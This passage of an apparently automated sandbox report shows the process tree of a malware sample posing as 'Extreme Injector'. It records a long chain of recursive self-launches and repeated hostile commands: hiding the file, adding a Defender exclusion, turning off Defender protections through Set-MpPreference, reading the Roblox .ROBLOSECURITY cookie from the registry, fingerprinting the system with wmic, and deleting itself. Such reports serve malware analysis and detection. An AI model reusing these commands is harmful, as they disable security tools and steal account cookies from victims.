        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        8⤵
        Checks computer location settings
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        9⤵
        Checks computer location settings
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        10⤵
        Checks computer location settings
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        11⤵
        Checks computer location settings
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        12⤵
        Checks computer location settings
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        13⤵
        Checks computer location settings
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        14⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        15⤵
        Checks computer location settings
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        16⤵
        Checks computer location settings
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        17⤵
        Checks computer location settings
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        18⤵
        Checks computer location settings
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        19⤵
        Checks computer location settings
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        20⤵
        Checks computer location settings
        
        PID:220
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        21⤵
        Checks computer location settings
        
        PID:432
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        22⤵
        Checks computer location settings
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        23⤵
        Checks computer location settings
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        24⤵
        Checks computer location settings
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        25⤵
        Checks computer location settings
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        26⤵
        Checks computer location settings
        
        PID:900
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        27⤵
        Checks computer location settings
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        28⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        29⤵
        Checks computer location settings
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        30⤵
        Checks computer location settings
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        31⤵
        Checks computer location settings
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        32⤵
        Checks computer location settings
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        33⤵
        Checks computer location settings
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        34⤵
        Checks computer location settings
        
        PID:64
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        35⤵
        Checks computer location settings
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        36⤵
        Checks computer location settings
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        37⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        38⤵
        Checks computer location settings
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        39⤵
        Checks computer location settings
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        40⤵
        Checks computer location settings
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        41⤵
        Checks computer location settings
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        42⤵
        Checks computer location settings
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        43⤵
        Checks computer location settings
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        44⤵
        Checks computer location settings
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        45⤵
        Checks computer location settings
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        46⤵
        Checks computer location settings
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        47⤵
        Checks computer location settings
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        48⤵
        Checks computer location settings
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        49⤵
        Checks computer location settings
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        50⤵
        Checks computer location settings
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        51⤵
        Checks computer location settings
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        52⤵
        Checks computer location settings
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        53⤵
        Checks computer location settings
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        54⤵
        Checks computer location settings
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        55⤵
        Checks computer location settings
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        56⤵
        Checks computer location settings
        
        PID:3668
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        57⤵
        Checks computer location settings
        
        PID:3956
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        58⤵
        Checks computer location settings
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        59⤵
        Checks computer location settings
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        60⤵
        Checks computer location settings
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        61⤵
        Checks computer location settings
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        62⤵
        Checks computer location settings
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        63⤵
        Checks computer location settings
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        64⤵
        Checks computer location settings
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        65⤵
        Checks computer location settings
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        66⤵
        Checks computer location settings
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        67⤵
        Checks computer location settings
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        68⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        68⤵
        Drops file in Drivers directory
        
        PID:536
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        69⤵
        Views/modifies file attributes
        
        PID:5068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        69⤵
        
        PID:4040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        69⤵
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        67⤵
        
        PID:1976
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        66⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        65⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1600
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        66⤵
        Views/modifies file attributes
        
        PID:3152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        66⤵
        
        PID:116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        66⤵
        
        PID:4664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        66⤵
        
        PID:3532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        66⤵
        
        PID:2536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2268
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        66⤵
        Detects videocard installed
        
        PID:396
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        66⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2496
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        67⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        64⤵
        Executes dropped EXE
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        63⤵
        Executes dropped EXE
        
        PID:224
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        62⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2688
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        63⤵
        Views/modifies file attributes
        
        PID:3924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        63⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        63⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        63⤵
        
        PID:4744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        63⤵
        
        PID:2848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        63⤵
        
        PID:3136
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        63⤵
        
        PID:1824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        63⤵
        
        PID:5080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        63⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1884
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        63⤵
        Detects videocard installed
        
        PID:4928
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        63⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1980
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        64⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        61⤵
        Executes dropped EXE
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        60⤵
        Executes dropped EXE
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        59⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4888
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        60⤵
        Views/modifies file attributes
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        60⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        60⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        60⤵
        
        PID:232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        60⤵
        
        PID:3532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        60⤵
        
        PID:3168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        60⤵
        
        PID:436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        60⤵
        
        PID:1808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        60⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2928
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        60⤵
        Detects videocard installed
        
        PID:3744
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        60⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4456
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        61⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        58⤵
        Executes dropped EXE
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        57⤵
        Executes dropped EXE
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        56⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1040
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        57⤵
        Views/modifies file attributes
        
        PID:3328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        57⤵
        
        PID:2364
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        57⤵
        
        PID:664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        57⤵
        
        PID:1908
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        57⤵
        
        PID:2672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        57⤵
        
        PID:3924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        57⤵
        Detects videocard installed
        
        PID:3456
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        57⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3588
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        58⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        55⤵
        Executes dropped EXE
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        54⤵
        Executes dropped EXE
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        53⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:428
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        54⤵
        Views/modifies file attributes
        
        PID:4856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        54⤵
        
        PID:1116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        54⤵
        
        PID:4680
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        54⤵
        
        PID:1720
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        54⤵
        
        PID:4876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        54⤵
        
        PID:4656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1736
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        54⤵
        Detects videocard installed
        
        PID:3232
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1756
        
